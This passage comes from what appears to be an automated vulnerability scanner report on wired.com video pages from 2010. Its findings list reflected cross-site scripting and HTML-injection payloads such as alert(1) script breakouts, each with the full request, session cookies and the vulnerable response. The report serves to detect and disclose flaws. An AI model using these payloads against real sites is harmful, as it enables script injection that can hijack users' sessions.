Cache-Control: max-age=283
Expires: Mon, 22 Nov 2010 00:44:32 GMT
Date: Mon, 22 Nov 2010 00:39:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "make-drones-almost-invincible","latest-videos","latest","1815816633","video","6607045410011228f"-alert(1)-"0a46e08cda4"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1189. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4baf3"><a>7998fcdbb93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video4baf3"><a>7998fcdbb93/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29453
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:45:14 GMT
Date: Mon, 22 Nov 2010 00:40:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video4baf3"><a>7998fcdbb93 ss_latest-videos c_latest">
...[SNIP]...

1.1190. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d8699--><script>alert(1)</script>a361df0d06f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videod8699--><script>alert(1)</script>a361df0d06f/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29492
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:46:20 GMT
Date: Mon, 22 Nov 2010 00:41:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videod8699--><script>alert(1)</script>a361df0d06f/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001
-->
...[SNIP]...

1.1191. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e455"-alert(1)-"6ef62eb7367 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos6e455"-alert(1)-"6ef62eb7367/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=299
Expires: Mon, 22 Nov 2010 00:47:27 GMT
Date: Mon, 22 Nov 2010 00:42:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106806


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos6e455"-alert(1)-"6ef62eb7367","making-the-soundtrack-harry-potter-and-the-deathly-hallows","latest","1815816633","653378922001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1192. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9840b"><a>577d7885e1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos9840b"><a>577d7885e1b/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=278
Expires: Mon, 22 Nov 2010 00:45:59 GMT
Date: Mon, 22 Nov 2010 00:41:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106728


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos9840b"><a>577d7885e1b c_latest">
...[SNIP]...

1.1193. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30bb5"-alert(1)-"69a02b42d6f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest30bb5"-alert(1)-"69a02b42d6f/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=297
Expires: Mon, 22 Nov 2010 00:48:44 GMT
Date: Mon, 22 Nov 2010 00:43:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106742


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "making-the-soundtrack-harry-potter-and-the-deathly-hallows","latest-videos","1815816633","653378922001","latest30bb5"-alert(1)-"69a02b42d6f","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1194. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec3d7"><a>5e95bf70531 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latestec3d7"><a>5e95bf70531/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:46 GMT
Date: Mon, 22 Nov 2010 00:42:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106819


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latestec3d7"><a>5e95bf70531">
...[SNIP]...

1.1195. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1898"-alert(1)-"2edd90105c3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633d1898"-alert(1)-"2edd90105c3/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:49:02 GMT
Date: Mon, 22 Nov 2010 00:44:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "making-the-soundtrack-harry-potter-and-the-deathly-hallows","latest-videos","latest","653378922001","1815816633d1898"-alert(1)-"2edd90105c3","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1196. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 940f6"-alert(1)-"b91cf5f1eb9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows940f6"-alert(1)-"b91cf5f1eb9/653378922001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=288
Expires: Mon, 22 Nov 2010 00:48:59 GMT
Date: Mon, 22 Nov 2010 00:44:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "making-the-soundtrack-harry-potter-and-the-deathly-hallows940f6"-alert(1)-"b91cf5f1eb9","latest-videos","latest","1815816633","653378922001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1197. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 878e5"-alert(1)-"ee44701c9fe was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001878e5"-alert(1)-"ee44701c9fe HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:49:45 GMT
Date: Mon, 22 Nov 2010 00:44:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106714


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "653378922001878e5"-alert(1)-"ee44701c9fe","making-the-soundtrack-harry-potter-and-the-deathly-hallows","latest-videos","latest","1815816633","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1198. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f33fc"><a>f604c53d836 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videof33fc"><a>f604c53d836/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29445
Vary: Accept-Encoding
Cache-Control: max-age=295
Expires: Mon, 22 Nov 2010 00:40:50 GMT
Date: Mon, 22 Nov 2010 00:35:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videof33fc"><a>f604c53d836 ss_latest-videos c_latest">
...[SNIP]...

1.1199. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7521e--><script>alert(1)</script>c40066a1c9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video7521e--><script>alert(1)</script>c40066a1c9e/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29484
Vary: Accept-Encoding
Cache-Control: max-age=285
Expires: Mon, 22 Nov 2010 00:41:24 GMT
Date: Mon, 22 Nov 2010 00:36:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video7521e--><script>alert(1)</script>c40066a1c9e/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001
-->
...[SNIP]...

1.1200. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90bcb"-alert(1)-"aa4a4cfdcc3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos90bcb"-alert(1)-"aa4a4cfdcc3/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:39 GMT
Date: Mon, 22 Nov 2010 00:37:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106734


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "672339556001","latest","1815816633","latest-videos90bcb"-alert(1)-"aa4a4cfdcc3","video","noire-thriller-set-in-seedy-los-angeles-of-the-40s"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1201. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bdf6"><a>7f3d840db93 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos2bdf6"><a>7f3d840db93/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:44 GMT
Date: Mon, 22 Nov 2010 00:36:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106766


